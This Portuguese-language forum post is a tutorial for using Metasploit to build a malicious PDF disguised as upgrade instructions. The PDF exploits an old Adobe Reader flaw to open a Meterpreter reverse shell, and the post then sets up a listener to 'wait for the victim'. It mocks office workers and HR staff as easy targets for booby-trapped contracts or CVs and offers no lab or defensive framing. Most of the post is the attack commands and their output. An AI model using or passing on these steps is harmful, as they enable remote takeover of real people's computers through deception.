Metasploit – Payload no formato PDF

Ownar com Pdf é delicia, otario de escritorio cai facinho esperando aquele contrato ou o RH esperando aquele curriculum.

Descrição

Bom mais um tutorial pra vocês , dessa vez como criar um”Payload no formato .pdf”

1- abra o metasploit e digite esses comandos:

Code: Select all

msf > use exploit/windows/fileformat/adobe_utilprintf
 set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME  BestComputers-UpgradeInstructions.pdf

> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

 > set LHOST (AQUI VOCÊ COLOCARA O IP DA SUA PLACA DE REDE exp ,wlan0 , eth0)

 > set LPORT 4455

 > show options
                                                                   TEM QUE ESTAR ASSIM!
Module options:
   Name        Current Setting                             Required  Description
   ----        ---------------                             --------  -----------
   FILENAME    BestComputers-UpgradeInstructions.pdf       yes       The file name.
   OUTPUTPATH  /pentest/exploits/framework3/data/exploits  yes       The location of the file.


Payload options windows/meterpreter/reverse_tcp:

   Name      Current Setting  Required  Description            
   ----      ---------------  --------  -----------            
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     SEU IP    yes       The local address      
   LPORT     4455             yes       The local port 
   
   Exploit target:
   
   ID   Name
   --     . . . . . .
   0        Adobe Reader v8.1.2 (Windows XP SP3 English)

Agora digitem:
set OUTPUTPATH /home/myth/ AQUI SERA SEU DIRETORIO ONDE VOCE QUER SALVAR <<[/code]

Agora dê um exploit

Image

E como vocês podem ver crio.

Agora abra o terminal e vá nesse diretório : /root/.msf4/local/ e vai estar lá.

OK, PRIMEIRA PARTE ESTÁ FEITA!

Agora volte pro metasploit e digite: back

Image

e Agore digite esses comando :

Code: Select all

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP DA PLACA DE REDE DE VCS
set LPORT 4455
[b]EXPLOIT[/b]

E agora só esperar por sua vitima!